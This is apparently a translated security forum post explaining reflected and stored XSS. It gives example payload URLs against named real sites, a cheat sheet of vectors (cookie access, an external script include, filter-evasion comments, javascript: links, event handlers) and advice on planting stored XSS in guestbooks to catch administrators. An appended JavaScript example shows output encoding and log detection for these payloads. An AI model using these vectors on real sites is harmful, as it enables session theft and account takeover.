Many people in the security community pay no attention to XSS; they always treat it as a low-value bug that is hardly worth the trouble. How many people actually understand XSS?
XSS is divided into stored and reflected types.
The so-called reflected type most often shows up in URL search parameters, for example:
http://www.kuaikuai.cn/search?q=%3Cscript%3E%20alert%28%27%E5%BA%97%E5%B0%8F%E4%B8%89%27%29%3B%3C%2Fscript%3E
http://www.bkjia.com/third.cgi?w=%3Cscript%3E+alert%28%2f70838550%2F%29%3B%3C%2Fscript%3E&y=5&k=&netid=&v=%D7%DB%BA%CF
http://search.inhe.net/inhesearch/search.jsp?channelid=75029&searchword=%3Cscript%3E+alert%28document.cookie%29%3B%3C%2Fscript%3E&x=51&y=6
These are what people call reflected XSS. What can XSS do, and how does it steal cookies? Through asynchronous transmission with Ajax. Anyone who has studied web development knows what Ajax is. When a reflected XSS lets you load an external JS file, that file only needs to contain Ajax code that reads the cookie and sends it to a specified receiving file. What can be done with a cookie? See below.
Stored XSS
The stored XSS I have seen most often is in guestbooks, private messages on dating forums and similar places. There, unlike reflected XSS, nobody has to be tricked into triggering it: the payload is saved in the database and runs automatically for whoever views the page, with no further action by the attacker.
Encoding and obfuscation tricks used in the JavaScript:
The escape() function encodes a string.
unescape() decodes an escape()-encoded string.
The decoded string is then executed inside eval().
Script Encoder, developed by Microsoft, encrypts the script.
Obfuscation with empty strings and garbled characters.
Junk code added in whitespace (tabs and spaces) and in // comments, which does not affect normal execution of the script.
<script>alert('店小三')</script>  -- common XSS code
<script>alert(document.cookie);</script>  -- gets the cookie
XSS through an img URL
<script src="http://www.bkjia.com/blog/ls.js"></script>  -- external call of the attack code ls.js
<SCRIPT>alert/* comment */('xsss')</SCRIPT>  -- comment trick to get past filtering
executes when the image fails to load
<iframe onload=alert('店小三')>  -- frame
<script>location='2014.com';</script>  -- jump to a page
body {background-image: url(javascript:alert("xss"))}  -- added to the CSS style
<a href="javascript:alert('xss')">店小三</a>  -- XSS in an a link
<div style="background-color:red" onmouseenter="alert('店小三')">xss</div>
These are the XSS vectors I use most often. There are of course others; these are just the most common, and which one fits depends on the specific situation. I trust the code is self-explanatory. If you want to play with XSS, I suggest you study the HTML/JavaScript tags and trigger events.
Whatever you do, do not think XSS is a weak bug. Many websites use sessions, and I have seen many backends whose session handling relies on nothing but the cookie; under high concurrency, if nothing requires a server-side session, the front end relies on cookies alone.
Here is an example. Suppose you have to penetrate a website but do not know who the administrator is or who the site belongs to. When you have no other way in, test the message (guestbook) function: that is where stored XSS shows up, because many website programs with a message function require an administrator to review the messages, and the administrator's review will certainly trigger it.
There is not much to say about filtering: if the symbols are filtered out, there is no way around it. So if you want to test XSS repeatedly, do the debugging locally.
A senior penetration tester must have strong debugging ability and a self-built test environment, so that you do not need to rely on others.
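As an added example that is not part of the original post, the JavaScript below shows the defender's side of the payloads and the filtering remark above: a context-aware output encoder for HTML text and URL attributes, applied to the same vector shapes (script tags, event handlers, javascript: URLs), and a log-side check that percent-decodes a query value like those in the reflected URLs and flags it for review. Function names and sample values are my own, not from the post.

```javascript
// Added example (not from the original post): output encoding that neutralises the
// vectors listed in this post, plus a log-side check for reflected payloads in query
// strings. Function names and sample values are constructed for this example.
// Encode untrusted text for an HTML text node or a quoted attribute value. With all five
// characters encoded, no tag, handler attribute or quote can be introduced, so <script>,
// <iframe onload=...>, alert/*...*/(...) and onmouseenter=... are all rendered as text.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// href, src and CSS url() need more than encoding: javascript:alert(1) contains none of
// those five characters. Allow http(s) and relative URLs only; anything else is replaced.
function safeUrl(u) {
  const url = String(u).trim();
  // browsers ignore control characters inside the scheme, so strip them before checking
  const scheme = url.replace(/[\u0000-\u0020]/g, '').toLowerCase();
  const hasScheme = /^[a-z][a-z0-9+.-]*:/.test(scheme);
  return (!hasScheme || /^https?:/.test(scheme)) ? url : 'about:blank';
}

// A search results page like those in the reflected URLs above, rendering the query and
// a caller-supplied link safely.
function renderSearch(q, link) {
  return `<p>Results for: ${encodeHtml(q)}</p>` +
         `<a href="${encodeHtml(safeUrl(link))}">source</a>`;
}

// Percent-decode a query value the way a log reviewer should: '+' is a space, decoding
// repeats (at most 3 rounds) to catch double encoding, and bytes that are not valid
// UTF-8 (such as GBK text like v=%D7%DB%BA%CF above) must not abort the check.
function percentDecode(v) {
  let s = String(v).replace(/\+/g, ' ');
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(s); } catch (e) { break; }
    if (next === s) break;
    s = next;
  }
  return s;
}

// Coarse check for the payload shapes in this post (tags, on*= handlers, javascript:),
// suitable for flagging access-log entries for review; expect some false positives.
function looksLikeReflectedXss(rawValue) {
  const d = percentDecode(rawValue);
  return /<\s*(script|iframe|img|a)\b/i.test(d) || /\bon[a-z]+\s*=/i.test(d) || /javascript\s*:/i.test(d);
}
```

The URL allow-list is deliberately strict (relative and http(s) only); encoding alone would leave the `<a href>` and CSS `url()` vectors from the list above intact.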